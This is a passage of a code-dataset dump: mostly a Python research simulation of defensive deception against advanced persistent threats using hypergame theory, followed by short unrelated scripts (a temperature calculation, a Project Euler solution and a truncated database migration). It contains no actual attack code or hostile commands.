random.choice(np.where(self.attacker.AHEU == max(self.attacker.AHEU))[0])\n att_DHEU_str_index = random.choice(np.where(self.attacker.att_guess_DHEU == max(self.attacker.att_guess_DHEU))[0])\n\n def_AHEU_str_index = random.choice(np.where(self.defender.def_guess_AHEU == max(self.defender.def_guess_AHEU))[0])\n # def_DHEU_str_index = random.choice(np.where(attacker.defender_HEU == max(attacker.defender_HEU))[0])\n def_DHEU_str_index = random.choice(np.where(self.defender.DHEU == max(self.defender.DHEU))[0])\n if att_AHEU_str_index == def_AHEU_str_index and att_DHEU_str_index == def_DHEU_str_index:\n self.hitting_result.append(True)\n else:\n self.hitting_result.append(False)\n\n\ndef game_start(simulation_id=0,\n DD_using=True,\n uncertain_scheme=True,\n web_data_upper_vul=7,\n Iot_upper_vul=5, Th_risk=0.3, _lambda=1, mu=8, SF_thres_1=1 / 3, SF_thres_2=1 / 2, att_detect_UpBod=0.5):\n print(\n f\"Start Simulation {simulation_id}, DD_using={DD_using}, uncertain_scheme={uncertain_scheme}, web_data_upper_vul={web_data_upper_vul}, Iot_upper_vul={Iot_upper_vul}\"\n )\n np.seterr(divide='ignore',\n invalid='ignore') # for remove divide zero warning\n\n game_continue = True\n\n game = game_class(simulation_id, DD_using, uncertain_scheme,\n web_data_upper_vul, Iot_upper_vul, Th_risk, _lambda, mu, SF_thres_1, SF_thres_2, att_detect_UpBod)\n\n while (not game.game_over):\n print(game.lifetime)\n if display:\n print(f\"attacker CKC: {game.attacker.CKC_position + 1}\")\n\n # print(game.lifetime)\n game.defender_round()\n attack_result = game.attacker_round(simulation_id)\n game.experiment_saving()\n game.NIDS_detect()\n att_outside = False\n if game.attacker.location is not None:\n att_outside = is_node_evicted(game.graph.network,\n game.attacker.location)\n\n # Decide whether to create new attacker\n if att_outside:\n game.evict_reason_history[0] += 1\n # check is attacker in honeypot\n att_in_honeypot = False\n if game.attacker.location is not None:\n if game.graph.network.has_node(game.attacker.location):\n if game.graph.network.nodes[\n game.attacker.location][\"type\"] == 3:\n att_in_honeypot = True\n game.evict_reason_history[1] += 1\n reason_box = [None]\n if is_system_fail(game.graph, reason_box, SF_thres_1, SF_thres_2):\n print(f\"Sim {simulation_id} SYSTEM FAIL \\U0001F480\")\n print(f\"Sim {simulation_id} GAME OVER\")\n game.game_over = True\n game.SysFail[reason_box[0]] = True\n game.prepare_for_next_game()\n data_exfil_succ = False\n if attack_result:\n if game.attacker.chosen_strategy == 7:\n data_exfil_succ = True\n print(\"Strategy 8 win !!!\")\n if att_outside or att_in_honeypot or data_exfil_succ:\n game.new_attacker(simulation_id)\n\n # if all-3 node evicted, End simulation\n all_evict_mark = list(\n nx.get_node_attributes(game.graph.network,\n \"evicted_mark\").values())\n if sum(all_evict_mark) >= len(all_evict_mark) - 3:\n print(f\"Sim {simulation_id} All node evicted\")\n game.SysFail[0] = True\n game.game_over = True\n\n if display: draw_graph(game.attacker.network)\n if display: draw_graph(game.graph.network)\n return game\n\n\ndef run_sumulation_fixed_setting(current_scheme, DD_using, uncertain_scheme,\n simulation_time):\n # simulation_time = 100\n\n # start = time.perf_counter()\n\n def_uncertainty_all_result = {}\n att_uncertainty_all_result = {}\n Time_to_SF_all_result = {}\n att_HEU_all_result = {}\n def_HEU_all_result = {}\n att_strategy_count_result = {}\n def_strategy_count_result = {}\n FPR_all_result = {}\n TPR_all_result = {}\n att_cost_all_result = {}\n def_cost_all_result = {}\n criticality_all_result = {}\n evict_reason_all_result = {}\n SysFail_reason = [0] * 3\n att_EU_C_all_result = {}\n att_EU_CMS_all_result = {}\n def_EU_C_all_result = {}\n def_EU_CMS_all_result = {}\n att_impact_all_result = {}\n def_impact_all_result = {}\n att_HEU_DD_IPI_all_result = {}\n def_HEU_DD_IPI_all_result = {}\n NIDS_eviction_all_result = {}\n hitting_probability_all_result = {}\n def_succ_counter_all_result = {}\n def_fail_counter_all_result = {}\n cost_per_strat_allresult = {}\n\n results = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for i in range(simulation_time):\n future = executor.submit(game_start, i, DD_using,\n uncertain_scheme) # scheme change here\n results.append(future)\n\n index = 0\n for future in results:\n # New Attacker\n Time_to_SF_all_result[index] = future.result().lifetime\n # HEU\n att_HEU_all_result[index] = future.result().att_HEU_history\n def_HEU_all_result[index] = future.result().def_HEU_history\n # Strategy Counter\n att_strategy_count_result[index] = future.result(\n ).att_strategy_counter\n def_strategy_count_result[index] = future.result(\n ).def_strategy_counter\n # Uncertainty\n def_uncertainty_all_result[index] = future.result(\n ).def_uncertainty_history\n att_uncertainty_all_result[index] = future.result(\n ).att_uncertainty_history\n # TPR & FPR\n FPR_all_result[index] = future.result().FPR_history\n TPR_all_result[index] = future.result().TPR_history\n # Cost\n att_cost_all_result[index] = future.result().att_cost_history\n def_cost_all_result[index] = future.result().def_cost_history\n # Criticality\n criticality_all_result[index] = future.result().criticality_hisotry\n # Evict attacker reason\n evict_reason_all_result[index] = future.result(\n ).evict_reason_history\n # System Fail reason\n if future.result().SysFail[0]:\n SysFail_reason[0] += 1 # [att_strat, system_fail]\n elif future.result().SysFail[1]:\n SysFail_reason[1] += 1\n elif future.result().SysFail[2]:\n SysFail_reason[2] += 1\n # EU_C & EU_CMS\n att_EU_C_all_result[index] = np.delete(future.result().att_EU_C, 0,\n 0)\n att_EU_CMS_all_result[index] = np.delete(\n future.result().att_EU_CMS, 0, 0)\n def_EU_C_all_result[index] = np.delete(future.result().def_EU_C, 0,\n 0)\n def_EU_CMS_all_result[index] = np.delete(\n future.result().def_EU_CMS, 0, 0)\n # attacker & defender impact\n att_impact_all_result[index] = np.delete(\n future.result().att_impact, 0, 0)\n def_impact_all_result[index] = np.delete(\n future.result().def_impact, 0, 0)\n # HEU in DD IPI\n att_HEU_DD_IPI_all_result[index] = np.delete(\n future.result().att_HEU_DD_IPI, 0, 0)\n def_HEU_DD_IPI_all_result[index] = np.delete(\n future.result().def_HEU_DD_IPI, 0, 0)\n # NIDS evict Bad or Good\n NIDS_eviction_all_result[index] = future.result().NIDS_eviction\n # hitting probability for Hypergame Nash Equilibrium\n hitting_probability_all_result[index] = future.result().hitting_result\n # defender success/fail counter\n def_succ_counter_all_result[index] = future.result().def_succ_counter\n def_fail_counter_all_result[index] = future.result().def_fail_counter\n # defender cost per strategy\n cost_per_strat_allresult[index] = future.result().def_per_strat_cost[1:]\n\n index += 1\n\n # SAVE to FILE (need to create directory manually)\n # history of when new attacker created\n os.makedirs(\"data/\" + current_scheme, exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/Time_to_SF.pkl\", \"wb+\")\n pickle.dump(Time_to_SF_all_result, the_file)\n the_file.close()\n\n # HEU\n os.makedirs(\"data/\" + current_scheme + \"/R1\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R1/att_HEU.pkl\", \"wb+\")\n pickle.dump(att_HEU_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R1/def_HEU.pkl\", \"wb+\")\n pickle.dump(def_HEU_all_result, the_file)\n the_file.close()\n\n # Strategy Counter\n os.makedirs(\"data/\" + current_scheme + \"/R2\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R2/att_strategy_counter.pkl\",\n \"wb+\")\n pickle.dump(att_strategy_count_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R2/def_strategy_counter.pkl\",\n \"wb+\")\n pickle.dump(def_strategy_count_result, the_file)\n the_file.close()\n\n # uncertainty\n os.makedirs(\"data/\" + current_scheme + \"/R3\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R3/defender_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(def_uncertainty_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R3/attacker_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(att_uncertainty_all_result, the_file)\n the_file.close()\n\n # TPR & FPR\n os.makedirs(\"data/\" + current_scheme + \"/R4\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R4/FPR.pkl\", \"wb+\")\n pickle.dump(FPR_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R4/TPR.pkl\", \"wb+\")\n pickle.dump(TPR_all_result, the_file)\n the_file.close()\n\n # Cost\n os.makedirs(\"data/\" + current_scheme + \"/R6\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R6/att_cost.pkl\", \"wb+\")\n pickle.dump(att_cost_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R6/def_cost.pkl\", \"wb+\")\n pickle.dump(def_cost_all_result, the_file)\n the_file.close()\n\n # Criticality\n # os.makedirs(\"data/\" + current_scheme + \"/R_self_1\", exist_ok=True)\n # the_file = open(\"data/\" + current_scheme + \"/R_self_1/criticality.pkl\",\n # \"wb+\")\n # pickle.dump(criticality_all_result, the_file)\n # the_file.close()\n\n # Evict attacker reason\n os.makedirs(\"data/\" + current_scheme + \"/R_self_2\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R_self_2/evict_reason.pkl\",\n \"wb+\")\n pickle.dump(evict_reason_all_result, the_file)\n the_file.close()\n\n # System Failure reason\n os.makedirs(\"data/\" + current_scheme + \"/R_self_3\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R_self_3/system_fail.pkl\",\n \"wb+\")\n pickle.dump(SysFail_reason, the_file)\n the_file.close()\n\n # EU_C & EU_CMS\n os.makedirs(\"data/\" + current_scheme + \"/R_self_4\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_EU_C.pkl\", \"wb+\")\n pickle.dump(att_EU_C_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_EU_CMS.pkl\",\n \"wb+\")\n pickle.dump(att_EU_CMS_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_EU_C.pkl\", \"wb+\")\n pickle.dump(def_EU_C_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_EU_CMS.pkl\",\n \"wb+\")\n pickle.dump(def_EU_CMS_all_result, the_file)\n the_file.close()\n\n # attacker & defender impact\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_impact.pkl\",\n \"wb+\")\n pickle.dump(att_impact_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_impact.pkl\",\n \"wb+\")\n pickle.dump(def_impact_all_result, the_file)\n the_file.close()\n\n # HEU in DD IPI\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_HEU_DD_IPI.pkl\",\n \"wb+\")\n pickle.dump(att_HEU_DD_IPI_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_HEU_DD_IPI.pkl\",\n \"wb+\")\n pickle.dump(def_HEU_DD_IPI_all_result, the_file)\n the_file.close()\n\n # NIDS evict good or bad\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/NIDS_eviction.pkl\",\n \"wb+\")\n pickle.dump(NIDS_eviction_all_result, the_file)\n the_file.close()\n\n # Hitting Probability\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/hitting_probability.pkl\", \"wb+\")\n pickle.dump(hitting_probability_all_result, the_file)\n the_file.close()\n\n # defender strategy success or failure\n os.makedirs(\"data/\" + current_scheme + \"/R6\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R6/def_succ_counter.pkl\", \"wb+\")\n pickle.dump(def_succ_counter_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R6/def_fail_counter.pkl\", \"wb+\")\n pickle.dump(def_fail_counter_all_result, the_file)\n the_file.close()\n\n # defender cost per strategy\n os.makedirs(\"data/\" + current_scheme + \"/R6\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R6/def_cost_per_strat.pkl\", \"wb+\")\n pickle.dump(cost_per_strat_allresult, the_file)\n the_file.close()\n\n\ndef run_sumulation_group_varying_vul(current_scheme, DD_using, uncertain_scheme,\n simulation_time):\n vul_range = {}\n MTTSF_all_result = np.zeros(5)\n att_cost_all_result = np.zeros(5)\n def_cost_all_result = np.zeros(5)\n att_HEU_all_result = np.zeros(5)\n def_HEU_all_result = np.zeros(5)\n att_uncertainty_all_result = np.zeros(5)\n def_uncertainty_all_result = np.zeros(5)\n FPR_all_result = np.zeros(5)\n TPR_all_result = np.zeros(5)\n\n # web_data_SoftVul_range = range(3,7+1)\n # IoT_SoftVul_range = range(1,5+1)\n web_data_SoftVul_range = np.array(range(1, 5 + 1)) * 2\n IoT_SoftVul_range = np.array(range(1, 5 + 1)) * 2\n vul_range[0] = web_data_SoftVul_range\n vul_range[1] = IoT_SoftVul_range\n\n results = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for vul_index in range(5):\n particular_vul_result = []\n for i in range(simulation_time):\n future = executor.submit(\n game_start, i, DD_using, uncertain_scheme,\n web_data_upper_vul=web_data_SoftVul_range[vul_index],\n Iot_upper_vul=IoT_SoftVul_range[vul_index]) # scheme change here\n particular_vul_result.append(future)\n results.append(particular_vul_result)\n\n index = 0\n for particular_vul_result in results:\n total_time_for_all_sim = 0\n for future in particular_vul_result:\n # change web server and database vul\n # MTTSF\n MTTSF_all_result[index] += future.result().lifetime\n # Cost\n att_cost_all_result[index] += sum(\n future.result().att_cost_history) / len(\n future.result().att_cost_history)\n def_cost_all_result[index] += sum(\n future.result().def_cost_history) / len(\n future.result().def_cost_history)\n # HEU\n att_HEU_all_result[index] += sum(\n future.result().att_HEU_history) / len(\n future.result().att_HEU_history)\n def_HEU_all_result[index] += sum(\n future.result().def_HEU_history) / len(\n future.result().def_HEU_history)\n # Uncertainty\n att_uncertainty_all_result[index] += sum(\n future.result().att_uncertainty_history) / len(\n future.result().att_uncertainty_history)\n def_uncertainty_all_result[index] += sum(\n future.result().def_uncertainty_history) / len(\n future.result().def_uncertainty_history)\n # FPR & TPR\n FPR_all_result[index] += sum(\n future.result().FPR_history) / len(\n future.result().FPR_history)\n TPR_all_result[index] += sum(\n future.result().TPR_history) / len(\n future.result().TPR_history)\n total_time_for_all_sim += 1\n\n att_cost_all_result[\n index] = att_cost_all_result[index] / total_time_for_all_sim\n def_cost_all_result[\n index] = def_cost_all_result[index] / total_time_for_all_sim\n att_HEU_all_result[\n index] = att_HEU_all_result[index] / total_time_for_all_sim\n def_HEU_all_result[\n index] = def_HEU_all_result[index] / total_time_for_all_sim\n att_uncertainty_all_result[index] = att_uncertainty_all_result[\n index] / total_time_for_all_sim\n def_uncertainty_all_result[index] = def_uncertainty_all_result[\n index] / total_time_for_all_sim\n FPR_all_result[\n index] = FPR_all_result[index] / total_time_for_all_sim\n TPR_all_result[\n index] = TPR_all_result[index] / total_time_for_all_sim\n MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n index += 1\n\n # SAVE to FILE (need to create directory manually)\n # Vul range\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/Range.pkl\", \"wb+\")\n pickle.dump(vul_range, the_file)\n the_file.close()\n # MTTSF\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/MTTSF.pkl\", \"wb+\")\n pickle.dump(MTTSF_all_result, the_file)\n the_file.close()\n\n # Cost\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/att_cost.pkl\", \"wb+\")\n pickle.dump(att_cost_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/def_cost.pkl\", \"wb+\")\n pickle.dump(def_cost_all_result, the_file)\n the_file.close()\n\n # HEU\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/att_HEU.pkl\", \"wb+\")\n pickle.dump(att_HEU_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/def_HEU.pkl\", \"wb+\")\n pickle.dump(def_HEU_all_result, the_file)\n the_file.close()\n\n # Uncertainty\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/att_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(att_uncertainty_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/def_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(def_uncertainty_all_result, the_file)\n the_file.close()\n\n # FPR & TPR\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/FPR.pkl\", \"wb+\")\n pickle.dump(FPR_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/TPR.pkl\", \"wb+\")\n pickle.dump(TPR_all_result, the_file)\n the_file.close()\n\n\n# def run_sumulation_group_varying_Th_risk(current_scheme, DD_using, uncertain_scheme,\n# simulation_time):\n# varying_range = [0.1, 0.2, 0.3, 0.4, 0.5]\n#\n# MTTSF_all_result = np.zeros(len(varying_range))\n# FPR_all_result = np.zeros(len(varying_range))\n# TPR_all_result = np.zeros(len(varying_range))\n#\n# results = []\n# with concurrent.futures.ProcessPoolExecutor() as executor:\n# for vary_index in range(len(varying_range)):\n# particular_vul_result = []\n# for i in range(simulation_time):\n# future = executor.submit(\n# game_start, i, DD_using, uncertain_scheme, Th_risk=varying_range[vary_index]) # scheme change here\n# particular_vul_result.append(future)\n# results.append(particular_vul_result)\n#\n# index = 0\n# for particular_vul_result in results:\n# total_time_for_all_sim = 0\n# for future in particular_vul_result:\n# # change web server and database vul\n# # MTTSF\n# MTTSF_all_result[index] += future.result().lifetime\n# # FPR & TPR\n# FPR_all_result[index] += sum(\n# future.result().FPR_history) / len(\n# future.result().FPR_history)\n# TPR_all_result[index] += sum(\n# future.result().TPR_history) / len(\n# future.result().TPR_history)\n# total_time_for_all_sim += 1\n#\n# FPR_all_result[\n# index] = FPR_all_result[index] / total_time_for_all_sim\n# TPR_all_result[\n# index] = TPR_all_result[index] / total_time_for_all_sim\n# MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n# index += 1\n#\n# # SAVE to FILE (need to create directory manually)\n# # vary range\n# os.makedirs(\"data/\" + current_scheme + \"/Th_risk\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/Th_risk/Range.pkl\", \"wb+\")\n# pickle.dump(varying_range, the_file)\n# the_file.close()\n# # MTTSF\n# os.makedirs(\"data/\" + current_scheme + \"/Th_risk\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/Th_risk/MTTSF.pkl\", \"wb+\")\n# pickle.dump(MTTSF_all_result, the_file)\n# the_file.close()\n#\n# # FPR & TPR\n# os.makedirs(\"data/\" + current_scheme + \"/Th_risk\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/Th_risk/FPR.pkl\", \"wb+\")\n# pickle.dump(FPR_all_result, the_file)\n# the_file.close()\n# the_file = open(\"data/\" + current_scheme + \"/Th_risk/TPR.pkl\", \"wb+\")\n# pickle.dump(TPR_all_result, the_file)\n# the_file.close()\n\n\n# def run_sumulation_group_varying_lambda(current_scheme, DD_using, uncertain_scheme,\n# simulation_time):\n# varying_range = [0.6, 0.7, 0.8, 0.9, 1]\n#\n# MTTSF_all_result = np.zeros(len(varying_range))\n# FPR_all_result = np.zeros(len(varying_range))\n# TPR_all_result = np.zeros(len(varying_range))\n#\n# results = []\n# with concurrent.futures.ProcessPoolExecutor() as executor:\n# for vary_index in range(len(varying_range)):\n# particular_vul_result = []\n# for i in range(simulation_time):\n# future = executor.submit(\n# game_start, i, DD_using, uncertain_scheme, _lambda=varying_range[vary_index]) # scheme change here\n# particular_vul_result.append(future)\n# results.append(particular_vul_result)\n#\n# index = 0\n# for particular_vul_result in results:\n# total_time_for_all_sim = 0\n# for future in particular_vul_result:\n# # change web server and database vul\n# # MTTSF\n# MTTSF_all_result[index] += future.result().lifetime\n# # FPR & TPR\n# FPR_all_result[index] += sum(\n# future.result().FPR_history) / len(\n# future.result().FPR_history)\n# TPR_all_result[index] += sum(\n# future.result().TPR_history) / len(\n# future.result().TPR_history)\n# total_time_for_all_sim += 1\n#\n# FPR_all_result[\n# index] = FPR_all_result[index] / total_time_for_all_sim\n# TPR_all_result[\n# index] = TPR_all_result[index] / total_time_for_all_sim\n# MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n# index += 1\n#\n# # SAVE to FILE (need to create directory manually)\n# # vary range\n# os.makedirs(\"data/\" + current_scheme + \"/_lambda\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/Range.pkl\", \"wb+\")\n# pickle.dump(varying_range, the_file)\n# the_file.close()\n# # MTTSF\n# os.makedirs(\"data/\" + current_scheme + \"/_lambda\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/MTTSF.pkl\", \"wb+\")\n# pickle.dump(MTTSF_all_result, the_file)\n# the_file.close()\n#\n# # FPR & TPR\n# os.makedirs(\"data/\" + current_scheme + \"/_lambda\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/FPR.pkl\", \"wb+\")\n# pickle.dump(FPR_all_result, the_file)\n# the_file.close()\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/TPR.pkl\", \"wb+\")\n# pickle.dump(TPR_all_result, the_file)\n# the_file.close()\n\n\n# def run_sumulation_group_varying_mu(current_scheme, DD_using, uncertain_scheme,\n# simulation_time):\n# varying_range = [6, 7, 8, 9, 10]\n#\n# MTTSF_all_result = np.zeros(len(varying_range))\n# FPR_all_result = np.zeros(len(varying_range))\n# TPR_all_result = np.zeros(len(varying_range))\n#\n# results = []\n# with concurrent.futures.ProcessPoolExecutor() as executor:\n# for vary_index in range(len(varying_range)):\n# particular_vul_result = []\n# for i in range(simulation_time):\n# future = executor.submit(\n# game_start, i, DD_using, uncertain_scheme, mu=varying_range[vary_index]) # scheme change here\n# particular_vul_result.append(future)\n# results.append(particular_vul_result)\n#\n# index = 0\n# for particular_vul_result in results:\n# total_time_for_all_sim = 0\n# for future in particular_vul_result:\n# # change web server and database vul\n# # MTTSF\n# MTTSF_all_result[index] += future.result().lifetime\n# # FPR & TPR\n# FPR_all_result[index] += sum(\n# future.result().FPR_history) / len(\n# future.result().FPR_history)\n# TPR_all_result[index] += sum(\n# future.result().TPR_history) / len(\n# future.result().TPR_history)\n# total_time_for_all_sim += 1\n#\n# FPR_all_result[\n# index] = FPR_all_result[index] / total_time_for_all_sim\n# TPR_all_result[\n# index] = TPR_all_result[index] / total_time_for_all_sim\n# MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n# index += 1\n#\n# # SAVE to FILE (need to create directory manually)\n# # vary range\n# os.makedirs(\"data/\" + current_scheme + \"/mu\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/mu/Range.pkl\", \"wb+\")\n# pickle.dump(varying_range, the_file)\n# the_file.close()\n# # MTTSF\n# os.makedirs(\"data/\" + current_scheme + \"/mu\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/mu/MTTSF.pkl\", \"wb+\")\n# pickle.dump(MTTSF_all_result, the_file)\n# the_file.close()\n#\n# # FPR & TPR\n# os.makedirs(\"data/\" + current_scheme + \"/mu\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/mu/FPR.pkl\", \"wb+\")\n# pickle.dump(FPR_all_result, the_file)\n# the_file.close()\n# the_file = open(\"data/\" + current_scheme + \"/mu/TPR.pkl\", \"wb+\")\n# pickle.dump(TPR_all_result, the_file)\n# the_file.close()\n\n\ndef run_sumulation_group_varying_universal(current_scheme, DD_using, uncertain_scheme, simulation_time, variable_name,\n varying_range):\n MTTSF_all_result = np.zeros(len(varying_range))\n FPR_all_result = np.zeros(len(varying_range))\n TPR_all_result = np.zeros(len(varying_range))\n att_uncertainty_all_result = np.zeros(len(varying_range))\n def_uncertainty_all_result = np.zeros(len(varying_range))\n\n results = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for vary_index in range(len(varying_range)):\n particular_vul_result = []\n for i in range(simulation_time):\n future = eval(\n \"executor.submit(game_start, i, DD_using, uncertain_scheme, \" + variable_name + \"=varying_range[vary_index])\") # scheme change here\n particular_vul_result.append(future)\n results.append(particular_vul_result)\n\n index = 0\n for particular_vul_result in results:\n total_time_for_all_sim = 0\n for future in particular_vul_result:\n # change web server and database vul\n # MTTSF\n MTTSF_all_result[index] += future.result().lifetime\n # FPR & TPR\n FPR_all_result[index] += sum(\n future.result().FPR_history) / len(\n future.result().FPR_history)\n TPR_all_result[index] += sum(\n future.result().TPR_history) / len(\n future.result().TPR_history)\n # Uncertainty\n att_uncertainty_all_result[index] += sum(\n future.result().att_uncertainty_history) / len(\n future.result().att_uncertainty_history)\n def_uncertainty_all_result[index] += sum(\n future.result().def_uncertainty_history) / len(\n future.result().def_uncertainty_history)\n total_time_for_all_sim += 1\n\n FPR_all_result[\n index] = FPR_all_result[index] / total_time_for_all_sim\n TPR_all_result[\n index] = TPR_all_result[index] / total_time_for_all_sim\n MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n att_uncertainty_all_result[index] = att_uncertainty_all_result[\n index] / total_time_for_all_sim\n def_uncertainty_all_result[index] = def_uncertainty_all_result[\n index] / total_time_for_all_sim\n index += 1\n\n # SAVE to FILE (need to create directory manually)\n # vary range\n os.makedirs(\"data/\" + current_scheme + \"/\" + variable_name, exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/Range.pkl\", \"wb+\")\n pickle.dump(varying_range, the_file)\n the_file.close()\n # MTTSF\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/MTTSF.pkl\", \"wb+\")\n pickle.dump(MTTSF_all_result, the_file)\n the_file.close()\n\n # FPR & TPR\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/FPR.pkl\", \"wb+\")\n pickle.dump(FPR_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/TPR.pkl\", \"wb+\")\n pickle.dump(TPR_all_result, the_file)\n the_file.close()\n\n # uncertainty\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/defender_uncertainty.pkl\", \"wb+\")\n pickle.dump(def_uncertainty_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/attacker_uncertainty.pkl\", \"wb+\")\n pickle.dump(att_uncertainty_all_result, the_file)\n the_file.close()\n","repo_name":"Wan-ZL/ARO-Foureye","sub_path":"Foureye 1 - Defensive Deception Against Advanced Persistent Threats via Hypergame Theory/PycharmProject/Foureye_parallel_simulation.py","file_name":"Foureye_parallel_simulation.py","file_ext":"py","file_size_in_byte":45829,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"36099101984","text":"# %%\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set(style=\"whitegrid\")\n\n# %%\nl_ttl = 8.4\nA = (7.5e-4)**2*np.pi #m^2\nI = 5 #A\nsigma = 3.46e6 #S/m\nc = 296 #J/Kg/K\nrho = 6440 #kg/m^3\nQ = 1.5e-8 #m^3/s\n\n# %%\ndl = 1e-3\nl = np.arange(0,l_ttl,dl)\ntemps = 20 + (I*l)/(c*rho*A*sigma*Q)\n\n#%%\nplt.plot(l,temps)\nplt.xlabel(\"Length\")\nplt.ylabel(\"Temperature\")\n\n#%%\n\n#%%\n","repo_name":"gvwalgiya/honours_project","sub_path":"archive/temp_validation.py","file_name":"temp_validation.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71138387049","text":"'''520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?'''\n\n\n\nn = int(input(\"To find the smallest positive number that is evenly divisible by all of the numbers from 1 to : _\"))\n\ndef smallestEvenlyDivisible(n):\n\ttestRange = range(1, n + 1)\n\tw = range(1, 1000000000000000000000000000000000000000000000000)\t\t\t\n\tfor x in w:\n\t\tcount = 0\n\t\tfor y in testRange:\n\t\t\tif x % y == 0:\n\t\t\t\tcount = count + 1\n\t\t\t\tif count == n:\n\t\t\t\t\treturn x\nfor t in range(n):\n\tprint(t , smallestEvenlyDivisible(t))","repo_name":"Emmanuel-Odero/practice","sub_path":"projects_on_progress/self_made/eulerMathematicalProjects/prob5.py","file_name":"prob5.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40433030857","text":"\"\"\"empty message\n\nRevision ID: 86fb3e3ea7e8\nRevises: e49f2ae65e25\nCreate Date: 2022-06-08 14:16:45.065457\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '86fb3e3ea7e8'\ndown_revision = 'e49f2ae65e25'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('appointments', sa.Column('date', sa.String(length=50), nullable=False))\n op.add_column('appointments', sa.Column('time', sa.String(length=50), nullable=False))\n op.drop_column('appointments', 'appointment')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please 